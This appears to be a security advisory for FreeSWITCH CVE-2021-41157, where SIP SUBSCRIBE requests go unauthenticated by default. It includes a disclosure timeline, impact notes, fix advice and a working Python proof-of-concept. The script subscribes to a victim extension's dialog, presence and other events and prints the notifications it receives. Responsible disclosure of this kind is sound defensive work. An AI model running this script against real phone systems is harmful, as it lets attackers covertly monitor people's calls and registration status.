# FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default

- Fixed versions: v1.10.7
- Enable Security Advisory: 
https://github.com/EnableSecurity/advisories/tree/master/ES2021-08-freeswitch-SIP-SUBSCRIBE-without-auth
- Vendor Security Advisory: 
https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj
- Other references: CVE-2021-41157
- Tested vulnerable versions: <= v1.10.5
- Timeline:
    - Report date: 2021-06-07
    - Triaged: 2021-06-08
    - Fix provided for testing: 2021-10-01
    - Vendor release with fix: 2021-10-24
    - Enable Security advisory: 2021-10-25

## Description

By default, SIP requests of the type SUBSCRIBE are not authenticated in the 
affected versions of FreeSWITCH. Although this issue was [fixed][1] in version 
v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an 
older version, may still be vulnerable if the configuration is not updated 
accordingly. For good reason, by default, software upgrades do not update the 
configuration.

[1]: 
https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e

## Impact

Abuse of this security issue allows attackers to subscribe to user agent event 
notifications without the need to authenticate. This abuse poses privacy 
concerns and might lead to social engineering or similar attacks. For example, 
attackers may be able to monitor the status of target SIP extensions.

## How to reproduce the issue

1. Install FreeSWITCH v1.10.5 or lower
2. Run FreeSWITCH using the default configuration
3. Register as a legitimate SIP user on the FreeSWITCH server using a softphone 
(e.g. sip:[email protected] where 192.168.188.128 is your FreeSWITCH server)
4. Save the below Python script to `anon-subscribe.py`
5. Run the script from an IP address that is different from that of the 
softphone `python anon-subscribe.py <freeswitch_ip> <freeswitch_port> 
<victim_extension>`
6. Perform some operations using the softphone, such as deregistering, 
registering, and placing a call
7. Observe that several notifications are received by the script, exposing the 
actions being performed by the victim

```python
import socket, string, random, re, sys

UDP_IP = sys.argv[1]
UDP_PORT = int(sys.argv[2])
EXT = sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

msg_template = "SUBSCRIBE sip:%s@%s;transport=UDP SIP/2.0\r\n" % (EXT, UDP_IP) 
+ \
    "Via: SIP/2.0/UDP [ip]:[port];rport;branch=z9hG4bK-[rand]\r\n" \
    "Max-Forwards: 70\r\n" \
    "Contact: <sip:%s@[ip]:[port];transport=udp>\r\n" % (EXT, ) + \
    "To: <sip:%s@%s;transport=UDP>\r\n" % (EXT, UDP_IP) + \
    "From: <sip:9999@%s;transport=UDP>;tag=[rand]\r\n" % (UDP_IP, ) + \
    "Call-ID: [rand]\r\n" \
    "CSeq: 1 SUBSCRIBE\r\n" \
    "Expires: 600\r\n" \
    "Accept: */*\r\n" \
    "Event: [event]\r\n" \
    "Content-Length: 0\r\n" \
    "\r\n"

rand = ''.join(random.choice(string.ascii_letters) for i in range(16))
msg = msg_template.replace('[ip]', '127.0.0.1') \
    .replace('[port]', '9999') \
        .replace('[event]', 'dialog') \
            .replace('[rand]', rand)

sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))

recv=sock.recv(10240).decode()

# get rport and received from Via header
rport=re.search( r'rport=([0-9]+)', recv, re.MULTILINE).group(1)
received=re.search( r'received=([0-9\.]+)', recv, re.MULTILINE).group(1)

events = [
    'talk', 'hold', 'conference', 'presence', 'as-feature-event', 'dialog', 
'line-seize', 
    'call-info', 'sla', 'include-session-description', 'presence.winfo', 
'message-summary', 
    'refer']

for event in events:
    rand = ''.join(random.choice(string.ascii_letters) for i in range(16))
    msg = msg_template.replace('[ip]', received) \
        .replace('[port]', rport) \
            .replace('[event]', event) \
                .replace('[rand]', rand)
    sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))

while True:
    print(sock.recv(10240).decode().split('\r\n\r\n')[1])
```

## Solution and recommendations

Upgrade to a version of FreeSWITCH that fixes this issue.

Our suggestion to the FreeSWITCH developers was the following:

> Our recommendation is that SIP SUBSCRIBE messages are authenticated by 
> default so that FreeSWITCH administrators do not need to explicitly set the 
> `auth-subscriptions` parameter. When following such a recommendation, a new 
> parameter can be introduced to explicitly disable authentication.

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